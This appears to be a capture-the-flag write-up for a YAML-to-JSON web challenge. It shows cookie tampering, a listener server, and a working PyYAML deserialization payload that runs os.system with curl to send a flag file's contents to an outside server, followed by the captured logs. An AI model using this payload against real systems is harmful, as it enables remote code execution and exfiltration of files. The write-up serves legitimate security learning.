Tags: pyyaml web 

Rating:

# page view

![image](https://user-images.githubusercontent.com/44183111/115112242-95756200-9fbf-11eb-8cae-163d382c7f4e.png)

- The target page converts `yaml to json.`

---

# step1) modify cookie
- you need to modify [premium cookie] false to true
![](https://media.discordapp.net/attachments/832278373064638504/832668607439044660/unknown.png)

---

# step2) simple http sever
- i used python http simple server to captrue the flag
``` bash
python3 -m http.server 3000
```

---

# step3) exploitation
- below is exploitation code
``` yaml
"parkmin": !!python/object/apply:os.system ["curl http://myserver.com:3000/?`cat /tmp/flag.txt`"]
```

- you can get flag at the simple http server
``` bash
152.14.92.89 - - [16/Apr/2021 18:06:26] "GET /? HTTP/1.1" 200 -
152.14.92.89 - - [16/Apr/2021 18:06:33] "GET /? HTTP/1.1" 200 -
152.14.92.89 - - [16/Apr/2021 18:06:47] "GET /?flagPy_PyYaml_Yaml_Py HTTP/1.1" 200 -
152.14.92.89 - - [16/Apr/2021 18:07:07] "GET /?flagPy_PyYaml_Yaml_Py HTTP/1.1" 200 -
```

Original writeup (https://r99bbit.github.io/ctf/2021-HackPack-CTF-yaml-2-json/).